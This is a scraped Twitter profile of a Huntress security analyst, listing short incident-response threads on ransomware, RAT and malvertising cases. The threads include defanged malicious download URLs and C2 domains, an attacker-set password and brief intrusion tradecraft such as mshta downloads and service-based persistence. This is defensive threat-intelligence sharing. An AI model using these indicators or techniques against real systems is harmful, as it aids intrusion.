Faith(@f0xtrot_sierra) 's Twitter Profileg
Faith

@f0xtrot_sierra

Associate Security Operations Analyst @HuntressLabs

ID:1618553087874015232

calendar_today26-01-2023 10:15:41

23 Tweets

410 Followers

30 Following

Josh(@xorJosh) 's Twitter Profile Photo
Josh
@xorJosh

2 months ago

BianLian Investigation 🧵

Initial access to data Exfil within 3 hours

Initial access via RDPWeb
Enumeration via Manual/Advanced IP scanner
Golang backdoor to tunnel
Data Exfil via MegaSync

account_circle
Ame(@pe4Chscreeching) 's Twitter Profile Photo
Ame
@pe4Chscreeching

5 months ago

Following the data collection, two user accounts 'administrator' and 'icsadmin' were both altered and given the password 'P@ssw0rd01!'.

The environment was isolated before any further activity could occur.

Following the data collection, two user accounts 'administrator' and 'icsadmin' were both altered and given the password 'P@ssw0rd01!'. The environment was isolated before any further activity could occur.
account_circle
Ame(@pe4Chscreeching) 's Twitter Profile Photo
Ame
@pe4Chscreeching

5 months ago

An unsuccessful data exfiltration case seen at Huntress using WinRar 🧵

After the threat actor had access to the host via RDP, WinRar was used to look for specific file extensions within the F:\ drive from the last 365 days and saved the data in parts to 'F:\output.rar'.

An unsuccessful data exfiltration case seen at @HuntressLabs using WinRar 🧵 After the threat actor had access to the host via RDP, WinRar was used to look for specific file extensions within the F:\ drive from the last 365 days and saved the data in parts to 'F:\output.rar'.
account_circle
Josh(@xorJosh) 's Twitter Profile Photo
Josh
@xorJosh

6 months ago

Huntress
A Google AD is serving a malicious WinSCP Python installer, resulting in rapid lateral movement 🧵

1. Google AD -> gaweeweb[.]com -> winccp[.]net

@HuntressLabs A Google AD is serving a malicious WinSCP Python installer, resulting in rapid lateral movement 🧵 1. Google AD -> gaweeweb[.]com -> winccp[.]net
account_circle
Josh(@xorJosh) 's Twitter Profile Photo
Josh
@xorJosh

6 months ago

Over the past year, had a couple of cases where a new service was created, 'WMI helper agent', which launches 'wmihelper.exe' out of '\AppData\Roaming\Microsoft\Wmi\'; the executable is renamed github.com/winsw/winsw In both cases this was used to establish persistence via ssh

Over the past year, had a couple of cases where a new service was created, 'WMI helper agent', which launches 'wmihelper.exe' out of '\AppData\Roaming\Microsoft\Wmi\'; the executable is renamed github.com/winsw/winsw In both cases this was used to establish persistence via ssh
account_circle
Faith(@f0xtrot_sierra) 's Twitter Profile Photo
Faith
@f0xtrot_sierra

8 months ago

RMM tool abuse and Akira ransomware, an @Huntresslabs case.

The TA first used RDP to gain access to the network. Once they were in, we observed them installing instances of both AnyDesk and RustDesk remote access tools on multiple hosts to establish footholds in the network.

RMM tool abuse and Akira ransomware, an @Huntresslabs case. The TA first used RDP to gain access to the network. Once they were in, we observed them installing instances of both AnyDesk and RustDesk remote access tools on multiple hosts to establish footholds in the network.
account_circle
Josh(@xorJosh) 's Twitter Profile Photo
Josh
@xorJosh

9 months ago

Today Huntress likely infection observed.

Service created to launch mshta for download and then installed with Msiexec

hxxp://61.190.37[.]146:13842/20AC0B78.Png
hxxp://37.238.169[.]235:17541/20AC0B78.Png
hxxp://103.233.65[.]226:17244/20AC0B78.Png

Today @HuntressLabs likely #PurpleFox infection observed. Service created to launch mshta for download and then installed with Msiexec hxxp://61.190.37[.]146:13842/20AC0B78.Png hxxp://37.238.169[.]235:17541/20AC0B78.Png hxxp://103.233.65[.]226:17244/20AC0B78.Png
account_circle
Faith(@f0xtrot_sierra) 's Twitter Profile Photo
Faith
@f0xtrot_sierra

10 months ago

Had a RAT case @Huntresslabs, the user downloaded a malicious .js file that led to the download and execution of multiple malicious .ps1 scripts. The RAT reached out to hxxps[://]xyzontheway[.]xyz/wp-admin/images/r.txt cc GoDaddy Help please take down.

Had a RAT case @Huntresslabs, the user downloaded a malicious .js file that led to the download and execution of multiple malicious .ps1 scripts. The RAT reached out to hxxps[://]xyzontheway[.]xyz/wp-admin/images/r.txt cc @GoDaddyHelp please take down.
account_circle
Faith(@f0xtrot_sierra) 's Twitter Profile Photo
Faith
@f0xtrot_sierra

10 months ago

Had a case today Huntress with all the signs of Chrome Loader, but the initial dropper file downloaded was '7680x4320 Tooth Creative Art 8k 8k HD 4k Wallpa___.msi'
This is a development from .exe and .iso files seen in the past.
VT scan of the original file came up clean

Had a case today @HuntressLabs with all the signs of Chrome Loader, but the initial dropper file downloaded was '7680x4320 Tooth Creative Art 8k 8k HD 4k Wallpa___.msi' This is a development from .exe and .iso files seen in the past. VT scan of the original file came up clean
account_circle